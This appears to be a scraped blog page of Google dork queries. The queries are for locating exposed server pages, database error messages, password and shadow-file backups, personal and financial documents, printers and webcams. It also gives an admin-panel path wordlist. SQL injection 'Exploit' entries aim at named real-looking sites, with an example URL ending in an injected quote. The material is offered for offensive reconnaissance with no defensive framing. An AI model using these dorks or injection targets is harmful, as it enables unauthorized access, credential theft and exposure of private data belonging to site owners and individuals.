intitle:”Test Page for Apache Installation” “Seeing this instead”
Apache 1.3.11 – 1.3.33, 2.0
intitle:”Test Page for the SSL/TLS-aware Apache Installation” “Hey, it worked!”
Apache SSL/TLS
intitle:”Test Page for the Apache Web Server on Red Hat Linux”
Apache on Red Hat
intitle:”Test Page for the Apache Http Server on Fedora Core”
Apache on Fedora
intitle:”Welcome to Your New Home Page!”
Debian Apache on Debian
intitle:”Welcome to IIS 4.0!”
IIS 4.0
intitle:”Welcome to Windows 2000 Internet Services”
IIS 5.0

intitle:”Welcome to Windows XP Server Internet Services”
IIS 6.0
Querying for application-generated system reports
“Generated by phpSystem”

operating system type and version, hardware configuration, logged users, open connections, free memory and disk space, mount points
“This summary was generated by wwwstat”
web server statistics, system file structure
“These statistics were produced by getstats”
web server statistics, system file structure
“This report was generated by WebLog”
web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
systemperformance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
server version, operating system type, child process list, current connections
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
web server activity, lots of visitor information
intitle:”Multimon UPS status page”
UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”

system performance statistics as MRTG charts, hardware configuration, running services
intitle:”Usage Statistics for” “Generated by Webalizer”
web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
web server statistics, visitor information
nurl:”/axs/ax-admin.pl” -script
web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
operating system type and version, logged users, free memory and disk space, mount points, running processes, system logs



dork for finding admin page
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
phpSQLiteAdmin/
server_admin_small/
database_administration/
system_administration/

Update Imp. Dorks.
Dork : "inurl:dettaglio.php?id="

Exploit :
www.victim.com/sito/dettaglio.php?id=[SQL]

Example :
http://www.cicloposse.com/dettaglio.php?id=61'
----------------------------------------------------------------------------------------------------------------
Dork: inurl:prodotto.php?id)

Exploit: 
www.victim.com/prodotto.php?id=[SQL]

Example:http://www.poderimorini.com/en/prodotto.php?id=14'




sql injection dorks 

allinurl: \”index php go buy\”
allinurl: \”index.php?go=sell\”
allinurl: \”index php go linkdir\”
allinurl: \”index.php?go=resource_center\”
allinurl: \”resource_center.html\”
allinurl: \”index.php?go=properties\”
allinurl: \”index.php?go=register\”

Error message queries
“A syntax error has occurred”filetype:ihtml
Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords
“Access denied for user” “Using password”
authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code
“The script whose uid is ” “is not allowed to access”

access-related PHP errors, potentially containing filenames, function names and file structure information
“ORA-00921: unexpected end of SQL command”
Oracle database errors, potentially containing filenames, function names and file structure information
“error found handling the request” cocoon filetype:xml
Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information
“Invision Power Board Database Error”

Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code
“Warning: mysql _ query()” “invalid query”
MySQL database errors, potentially containing user names, function names, filenames and file structure information
“Error Message : Error loading required libraries.”

CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information
“#mysql dump” filetype:sql
MySQL database errors, potentially containing information about database structure and contents
Dork for locating passwords
http://*:*@www” site
passwords for site, stored as the string “http://username:password@www…”
filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, potentially containing user names and passwords
filetype:mdb inurl:”account|users|admin|admin istrators|passwd|password”
mdb files, potentially containing password information
intitle:”Index of” pwd.db
pwd.db files, potentially containing user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ FTP.ini”
filetype:ini WS _ FTP PWD
WS_FTP configuration files, potentially containing FTP server access passwords
ext:pwd inurl:(service|authors|administrators |users) “# -FrontPage-”
files containing Microsoft FrontPage passwords
filetype:sql (“passwd values ****” | “password values ****” | “pass values ****” )
files containing SQL code and passwords inserted into a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user

user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf
configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password”
configuration files for WV Dial
ext:ini eudora.ini
configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, potentially containing user account information
Searching for personal data and confidential documents
filetype:xls inurl:”email.xls”
email.xls files, potentially containing contact information
“phone * * *” “address *” “e-mail” intitle: “curriculum vitae”
CVs
“not for distribution”

confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt “msn”
MSN contacts list
filetype:QDF

QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, potentially containing information on bank accounts, financial summaries and credit card numbers
intitle:”Index Of” -inurl:maillog maillog size
maillog files, potentially containing e-mail
Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc
dork for locating network devices
“Copyright (c) Tektronix, Inc.” “printer status”
PhaserLink printers
inurl:”printer/main.html” intext:”settings”
Brother HL printers
intitle:”Dell Laser Printer” ews
Dell printers with EWS technology
intext:centreware inurl:status
Xerox Phaser 4500/6250/8200/8400 printers
inurl:hp/device/this.LCDispatcher
HP printers
intitle:liveapplet inurl:LvAppl
Canon Webview webcams
intitle:”EvoCam” inurl:”webcam.html”
Evocam webcams
inurl:”ViewerFrame?Mode=”

Panasonic Network Camera webcams
(intext:”MOBOTIX M1″ | intext:”MOBOTIX M10″) intext:”Open Menu” Shift-Reload
Mobotix webcams
inurl:indexFrame.shtml Axis
Axis webcams
intitle:”my webcamXP server!” inurl:”:8080″
webcams accessible via WebcamXP Server
allintitle:Brains, Corp.
camera webcams accessible via mmEye
intitle:”active webcam page”


 

Adf.ly


SociBuzz

ClixSense

EasyHits4U

The Most Popular Traffic Exchange

URLcash